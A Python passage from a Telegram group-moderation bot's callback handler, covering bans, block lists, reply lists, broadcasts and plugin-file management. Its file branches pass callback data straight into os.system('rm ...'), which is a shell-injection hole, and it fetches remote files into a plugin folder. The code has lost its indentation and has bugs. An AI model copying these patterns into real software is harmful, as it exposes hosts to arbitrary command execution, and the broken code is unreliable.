message_id = callback_query.message.message_id
date = json.loads(callback_query.data)
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID)
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
if date[0] == "Cordertow":
rank = isrank(redis,userID,chatID)
if (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner"):
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1]):
GetGprank = GPranks(date[1],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[1]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
return False
if date[0] == "delBL":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chat,Hash))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if re.search("del(.*)replys$",date[0]):
if int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
return 0
t = date[0].replace("del","")
if date[1] != "kb":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,date[1],t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("del(.*)replysBOT",date[0]):
rank = isrank(redis,userID,chatID)
if rank == "sudo":
t = date[0].replace("del","")
t = t.replace("BOT","")
if date[1] != "kb":
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "delfromb":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockSTICKERs":
ID = callback_query.message.sticker.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockphotos":
ID = callback_query.message.photo.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
User_click = int((redis.get("{}Nbot:{}:floodClick".format(BOT_ID,userID)) or 1))
if User_click > 10:
BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID,userFN)
Bot("sendMessage",{"chat_id":chatID,"text":r.banclick.format(BY),"disable_web_page_preview":True,"parse_mode":"html"})
redis.setex("{}Nbot:floodUsers:{}".format(BOT_ID,userID),60*2,"Ban")
redis.delete("{}Nbot:{}:floodClick".format(BOT_ID,userID))
if chatID == userID:
group = True
if group is True and int(date[2]) == userID and not redis.get("{}Nbot:floodUsers:{}".format(BOT_ID,userID)):
if date[0] == "delcheck":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.notcertain, callback_data=json.dumps(["kickcheck","",userID])),InlineKeyboardButton(r.certain, callback_data=json.dumps(["certain","",userID]))]])
random.shuffle(reply_markup.inline_keyboard[0])
Bot("editMessageText",{"chat_id":chatID,"text":r.ucertain,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "certain":
Bot("restrictChatMember",{"chat_id": chatID,"user_id":userID,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
Bot("editMessageText",{"chat_id":chatID,"text":r.unrestricted.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickcheck":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
crid = redis.get("{}Nbot:{}:creator".format(BOT_ID,chatID))
redis.sadd("{}Nbot:{}:bans".format(BOT_ID,chatID),userID)
reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Corder, callback_data=json.dumps(["Cordertow",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.bancheck.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delF":
File = date[1]
os.system("rm ./files/"+File)
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfile.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "delFa":
os.system("rm -rf ./files/*")
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfiles,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "dlf":
File = date[1]
os.system("rm ./files/"+File)
url = "https://raw.githubusercontent.com/jack1eljoker1/Blackv7-files/master/"+File
out = requests.get(url).text
f = open("./files/"+File,"w+")
f.write(out)
f.close()
Bot("editMessageText",{"chat_id":chatID,"text":r.Dua.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "au":
File = date[1]
if redis.sismember("{}Nbot:botfiles".format(BOT_ID),File):
redis.srem("{}Nbot:botfiles".format(BOT_ID),File)
else:
redis.sadd("{}Nbot:botfiles".format(BOT_ID),File)
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
array = []
for f in onlyfiles:
if f in filesR:
s = r.true
else:
s = r.false
array.append([InlineKeyboardButton(f+" "+s,callback_data=json.dumps(["au",f,userID]))])
kb = InlineKeyboardMarkup(array)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "twostepset":
get = date[1]
if get == "eq":
redis.hset("{}Nbot:bancheck:t".format(BOT_ID),chatID,"two")
tx = r.Ttwo
g= "two"
if get == "two":
redis.hdel("{}Nbot:bancheck:t".format(BOT_ID),chatID)
g= "eq"
tx = r.Teq
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.tset.format(tx),callback_data=json.dumps(["twostepset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "floodset":
get = date[1]
if get == "ban":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"res")
tx = r.Tres
g= "res"
if get == "res":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"ban")
g= "ban"
tx = r.Tban
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.fset.format(tx),callback_data=json.dumps(["floodset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "delmsgclick":
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
Bot("deleteMessage",{"chat_id":chatID,"message_id":callback_query.message.reply_to_message.message_id})
if date[0] == "ckGPs":
rank = isrank(redis,userID,chatID)
if rank == "sudo":
Bot("editMessageText",{"chat_id":chatID,"text":r.ckpr,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
IDS = redis.smembers("{}Nbot:groups".format(BOT_ID))
i = 0
for ID in IDS:
get = Bot("getChat",{"chat_id":ID})
if get["ok"] == False:
redis.srem("{}Nbot:groups".format(BOT_ID),ID)
redis.sadd("{}Nbot:disabledgroups".format(BOT_ID),ID)
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1)
redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID),ID,str(NextDay_Date))
i+=1
time.sleep(0.3)
pr = redis.scard("{}Nbot:privates".format(BOT_ID))
gp = redis.scard("{}Nbot:groups".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.showstats.format(gp,pr)+r.Dckg.format(i),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "Chlang":
name = date[1]
redis.srem("{}Nbot:lang:ar".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:arem".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:en".format(BOT_ID),chatID)
redis.sadd("{}Nbot:lang:{}".format(BOT_ID,name),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":Clang(client, callback_query,redis,r)})
if date[0] == "ShowDateUser":
t = IDrank(redis,userID,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
rate = int(msgs)*100/20000
age = getAge(userID,r)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(Name(userFN),url="t.me/BLACK_TEAM_4")],[InlineKeyboardButton(r.Rrank.format(t),url="t.me/BLACK_TEAM_4")],[InlineKeyboardButton(r.Rmsgs.format(msgs),url="t.me/BLACK_TEAM_4")],[InlineKeyboardButton(r.Rrate.format(str(rate)+"%"),url="t.me/BLACK_TEAM_4")],[InlineKeyboardButton(r.Redits.format(edits),url="t.me/BLACK_TEAM_4")],[InlineKeyboardButton(r.Rage.format(age),url="t.me/BLACK_TEAM_4")]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("ShowO",date[0]):
T = date[0].replace("ShowO","")
rank = isrank(redis,userID,chatID)
if T == "lock":
reply_markup = getOR(rank,r,userID)
tx = r.LockO
if T == "admin":
reply_markup = getOR(rank,r,userID)
tx = r.AdminO
if T == "owner":
reply_markup = getOR(rank,r,userID)
tx = r.OwnerO
if T == "creator":
reply_markup = getOR(rank,r,userID)
tx = r.CreatorO
if T == "sudos":
reply_markup = getOR(rank,r,userID)
tx = r.SudosO
if T == "sudo":
reply_markup = getOR(rank,r,userID)
tx = r.SudoO
Bot("editMessageText",{"chat_id":chatID,"text":tx,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "sendtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "sendtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "kickme-yes":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
Bot("unbanChatMember",{"chat_id":chatID,"user_id":userID})
Bot("editMessageText",{"chat_id":chatID,"text":r.Dkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickme-no":
Bot("editMessageText",{"chat_id":chatID,"text":r.Nkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "delfromb":
Hash = date[1]
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chatId,TY),ID)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneUNblock,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Blocklist":
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showBlocklist","",userID])),InlineKeyboardButton(c.STgifs,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockanimations")),],[InlineKeyboardButton(c.STphoto,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockphotos")),InlineKeyboardButton(c.STsticker,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockSTICKERs")),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.blocklist2,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylist":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylist","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylist","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylist","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylist","",userID])),],[InlineKeyboardButton("Mp3",callback_data=json.dumps(["showAUreplylist","",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylist,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylistBOT":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylistBOT","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylistBOT","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylistBOT","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylistBot,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "alllist":
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton(c.STbanall,callback_data=json.dumps(["showbanall","",userID]))
,InlineKeyboardButton(c.STtkall,callback_data=json.dumps(["showtkall","",userID])),]
])
Bot("editMessageText",{"chat_id":chatID,"text":r.banlist,"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delallban":
redis.delete("{}Nbot:bans".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddelbanall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delalltk":
redis.delete("{}Nbot:restricteds".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddeltkall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "showBlocklist":
li = redis.smembers("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - "+word
i += 1
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.BlocklistRm,callback_data=json.dumps(["delListblockTEXTs","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.BlocklistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showbanall":
arrays = redis.smembers("{}Nbot:bans".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.allbandel,callback_data=json.dumps(["delallban","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.allbanE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showtkall":
arrays = redis.smembers("{}Nbot:restricteds".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.alltkdel,callback_data=json.dumps(["delalltk","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.alltkE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylist":
li = redis.hkeys("{}Nbot:{}:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showAUreplylist":
li = redis.hkeys("{}Nbot:{}:AUreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("📂꒐ قائمة الصوتيات فارغة",callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":"📂꒐ قائمة الصوتيات فارغة","message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylist":
li = redis.hkeys("{}Nbot:{}:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylist":
li = redis.hkeys("{}Nbot:{}:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylist":
li = redis.hkeys("{}Nbot:{}:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylistBOT":
li = redis.hkeys("{}Nbot:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylistBOT":
li = redis.hkeys("{}Nbot:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylistBOT":
li = redis.hkeys("{}Nbot:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylistBOT":
li = redis.hkeys("{}Nbot:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
